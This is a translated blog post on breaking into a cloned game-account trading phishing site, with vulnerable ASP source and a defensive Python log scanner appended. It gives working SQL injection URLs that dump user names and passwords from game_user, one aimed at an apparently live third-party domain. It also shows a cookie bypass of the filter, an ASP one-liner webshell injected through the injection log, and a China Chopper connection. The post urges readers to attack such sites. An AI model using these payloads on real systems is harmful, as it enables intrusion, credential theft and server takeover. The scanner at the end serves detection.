Imitation 5173 game-trading platform system: SQL injection (can directly *) + Getshell

    Recently I had nothing to do, so I logged back into a game I played years ago and noticed someone shouting offers to buy accounts at high prices. One look and it's obviously a scammer; did this scammer really think he could fool me? So I went to see how this clown scams people. It turned out he sent me a site he claimed was a 5173 trading platform and told me to fill in my account details there, after which he would go and "buy" it. I took a closer look at the platform, got hold of the source code and had a read ~ heh, there are quite a few holes. This imitation 5173 online-game trading platform has injection and getshell vulnerabilities, and the player data can be dumped directly ~
    I submitted it to WooYun but WooYun wouldn't accept it, so I'm posting it in the zone for everyone to play with. The system actually has plenty of vulnerabilities; I hate scammers more than anything, so go take down as many of these scam platforms as you can ~ Most of the cases are phishing sites set up by scammers.

    [screenshot: 0.jpg]

    A: SQL injection #1
    Vulnerable file: /help.asp

    <!--#include file="conn.asp"-->
    <!--#include file="inc/config.asp"-->

    <%
    ' request("id") is concatenated straight into the SQL string: this is the injection point
    if trim(request("id")) <> "" then
      set rs=conn.execute("select * from help where id ="&trim(request("id"))&" order by paixu asc")
      if not rs.eof then
        title=rs("help_title")
        content=rs("help_content")
      end if
    else
      set rs=conn.execute("select top 1 * from help order by paixu asc")
      if not rs.eof then
        title=rs("help_title")
        content=rs("help_content")
      end if
    end if
    %>


    Here the id parameter is not filtered strictly, so there is SQL injection, but conn.asp includes:
    <!--#include file="sqlin.asp"-->
    Everyone knows this anti-injection file is junk: it only filters GET and POST, so the injection can simply be switched to the cookie to bypass it. (A bare request("id") with no collection name also searches Request.Cookies, which sqlin.asp never inspects, so the cookie value reaches the query untouched.)

    [screenshot: 05.jpg]

    I won't dig further into this injection; let's look at the next injection point, which supports UNION queries.


    B: SQL injection #2
    Vulnerable file: /card_server.asp

    <%
    function OpenDB(sdbname)
    {
      /*
      *--------------- OpenDB(sdbname) -----------------
      * OpenDB(sdbname)
      * Purpose: open the database sdbname and return a conn object.
      * Parameter: sdbname, string, database name.
      * Example: var conn = OpenDB("database.mdb");
      *--------------- OpenDB(sdbname) -----------------
      */
      /*var connstr = "driver={SQL Server};server=.;uid=sa;pwd=7881541;database=wangyou";*/
      var connstr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source="+Server.MapPath(sdbname);
      var conn = Server.CreateObject("ADODB.Connection");
      conn.Open(connstr);
      return conn;
    }
    // The connection is created here directly, so conn.asp (and its sqlin.asp include) never runs.
    var oConn = OpenDB("HSGAMEDB/#HSgame201008041121.asp");
    var sel = Request("sel");
    var classid = Request("classid");
    var fieldname = Request("fieldname");
    var arrResult = new Array();
    //var sql = "select "+fieldname+" from game_class where parentid='"+sel+"' and classid="+classid;
    // sel is unvalidated and concatenated into the query: this is the injection point
    var sql = "select * from card_class where parentid="+sel+"";
    //Response.Write("alert("+sql+")")
    var rs0 = Server.CreateObject("ADODB.Recordset");
    rs0.Open(sql,oConn,1,1);
    while(!rs0.EOF)
    {
      // Collect every matching row into the arrResult array.
      arrResult[arrResult.length] = rs0(0).Value+"|"+rs0(1).Value;
      rs0.MoveNext();
    }
    // escape() works around XMLHTTP's handling of Chinese text.
    // Join the array into one string, separated by ",".
    Response.Write(escape(arrResult.join(",")));
    %>


    Here the database connection file is not included; the connection object is created directly, so this injection cannot be blocked by sqlin.asp at all. Note that the sel parameter from Request is passed into the query without any filtering, which causes the SQL injection. A simple way to trigger the injection point:


    http://127.0.0.1/card_server.asp?sel=1'

    Microsoft JET Database Engine 错误 '80040e14'
    字符串的语法错误 在查询表达式 'parentid=1'' 中。
    /card_server.asp,行 28



    [screenshots: 01.jpg, 02.jpg]


    Union queries work, so the player data in game_user can be dumped directly; I don't think sqlmap has game_user in its table dictionary? There is also a field "alipay_pwd", which is the user's payment password ~


    http://127.0.0.1/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user

    [screenshots: 03.jpg, 04.jpg]

    A generic-type submission requires five cases, so here are five ~





    Let me dump a table for everyone to see:

    http://www.tylsf.com.cn/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user

    [screenshot: 06.jpg]


    C: GETSHELL
    Vulnerable file: /SqlIn.Asp


    <%
    '-------- Database connection --------------
    'dim dbkillSql,killSqlconn,connkillSql
    ' The log database is an Access file with an .asp extension, stored inside the web root
    dbkillSql="sql_whelpu.asp"
    'On Error Resume Next
    Set killSqlconn = Server.CreateObject("ADODB.Connection")
    connkillSql="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql)
    killSqlconn.Open connkillSql
    If Err Then
      err.Clear
      Set killSqlconn = Nothing
      Response.Write "数据库连接出错,请检查连接字串。"
      Response.End
    End If


    '-------- Definitions ------------------
    'Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr,Kill_IP,WriteSql
    ' Custom list of strings to filter, separated by "|"
    Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
    Kill_IP=True
    WriteSql=True
    '----------------------------------


    Fy_Inf = split(Fy_In,"|")
    ' Only Request.Form and Request.QueryString are inspected below; Request.Cookies is never checked
    '-------- POST section ------------------
    If Request.Form<>"" Then
      For Each Fy_Post In Request.Form
        For Fy_Xh=0 To Ubound(Fy_Inf)
          If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
            If WriteSql=True Then
              ' The offending value is stored verbatim (only ' is doubled) in the .asp-named database file
              killSqlconn.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Fy_Post&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")
              killSqlconn.close
              Set killSqlconn = Nothing
            End If
            Response.Write "<Script Language=JavaScript>alert('系统提示:108非法操作!');</Script>"
            Response.Write "非法操作!系统做了如下记录↓<br>"
            Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
            Response.Write "操作时间:"&Now&"<br>"
            Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
            Response.Write "提交方式:POST<br>"
            Response.Write "提交参数:"&Fy_Post&"<br>"
            Response.Write "提交数据:"&Request.Form(Fy_Post)
            Response.Redirect("default.asp")
            Response.End
          End If
        Next
      Next
    End If
    '----------------------------------

    '-------- GET section -------------------
    If Request.QueryString<>"" Then
      For Each Fy_Get In Request.QueryString
        For Fy_Xh=0 To Ubound(Fy_Inf)
          If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
            If WriteSql=True Then
              ' Same logging as the POST branch: the query-string value lands in sql_whelpu.asp
              killSqlconn.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','GET','"&Fy_Get&"','"&replace(Request.QueryString(Fy_Get),"'","''")&"')")
              killSqlconn.close
              Set killSqlconn = Nothing
            End If
            Response.Write "<Script Language=JavaScript>alert('系统提示:108非法操作!');</Script>"
            Response.Write "非法操作!系统做了如下记录↓<br>"
            Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
            Response.Write "操作时间:"&Now&"<br>"
            Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
            Response.Write "提交方式:GET<br>"
            Response.Write "提交参数:"&Fy_Get&"<br>"
            Response.Write "提交数据:"&Request.QueryString(Fy_Get)
            Response.Redirect("default.asp")
            Response.End
          End If
        Next
      Next
    End If


    %>



    Here the strings that the user submitted and that were deemed illegal are written straight into the database sql_whelpu.asp. Think about it: if you deliberately submit a one-liner webshell, isn't that a GETSHELL? Because "%" is in Fy_In, an ASP tag is guaranteed to trip the filter and be logged, and since the log database sits under the web root with an .asp extension, IIS parses its contents as ASP when the file is requested. If no one has inserted ASP <%%> tags before, it can be accessed directly:

    http://127.0.0.1/list_buy.asp?class_1=35536%20%3C%eval%20request(1)%%3E

    Of course, if someone has submitted before, you need to take care with closing the existing tags, and then you have the webshell ~ Here the one-liner was successfully written into the database sql_whelpu.asp; let's open it and check:

    [screenshot: 08.jpg]

    Connect with Caidao (China Chopper):
    http://127.0.0.1/sql_whelpu.asp
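As an added defensive example (not from the original post or the platform's code): a small Python scanner over constructed IIS W3C log lines that flags the three request patterns described above, namely the card_server.asp union query, an ASP tag smuggled into a parameter that SqlIn.asp will log into sql_whelpu.asp, and any request for that log database file. The field layout and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C-style log lines (fields: date time c-ip cs-method cs-uri-stem
# cs-uri-query sc-status). Sample input for this example only, not from the post.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2014-11-17 10:01:02 10.0.0.5 GET /card_server.asp sel=1 200
2014-11-17 10:01:09 10.0.0.5 GET /card_server.asp sel=1' 500
2014-11-17 10:01:30 10.0.0.5 GET /card_server.asp sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user 200
2014-11-17 10:02:11 10.0.0.5 GET /list_buy.asp class_1=35536%20%3C%eval%20request(1)%%3E 302
2014-11-17 10:02:40 10.0.0.5 POST /sql_whelpu.asp - 200
2014-11-17 10:03:00 10.0.0.9 GET /help.asp id=12 200
"""

# Each rule: (tag, predicate over the parsed entry). The query is URL-decoded first,
# because the payloads in the post arrive percent-encoded (%20, %3C, ...).
RULES = [
    ("union-select", lambda e: re.search(r"\bunion\b.*\bselect\b", e["query"], re.I)),
    ("asp-tag-in-param", lambda e: "<%" in e["query"]),
    ("quote-probe", lambda e: "'" in e["query"] and e["status"] == 500),
    # SqlIn.asp keeps its log in sql_whelpu.asp under the web root; nothing legitimate
    # requests that file, so any hit on it (a POST in particular) is a webshell indicator.
    ("log-db-accessed", lambda e: e["stem"].lower().endswith("/sql_whelpu.asp")),
]

def parse_line(line):
    """Split one W3C log line into a dict; return None for directives and blank lines."""
    if not line.strip() or line.startswith("#"):
        return None
    date, time, ip, method, stem, query, status = line.split()
    return {"ip": ip, "method": method, "stem": stem,
            "query": unquote("" if query == "-" else query), "status": int(status)}

def classify(entry):
    """Return the list of rule tags that match one parsed entry."""
    return [tag for tag, pred in RULES if pred(entry)]

def scan(log_text):
    """Return (client ip, uri stem, tags) for every line that trips at least one rule."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            hits.append((entry["ip"], entry["stem"], tags))
    return hits
```

Run scan() over a real log export; the union and ASP-tag rules catch the encoded payloads only because the query string is decoded before matching.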

    Original article: https://www.cnblogs.com/hookjoy/p/4104618.html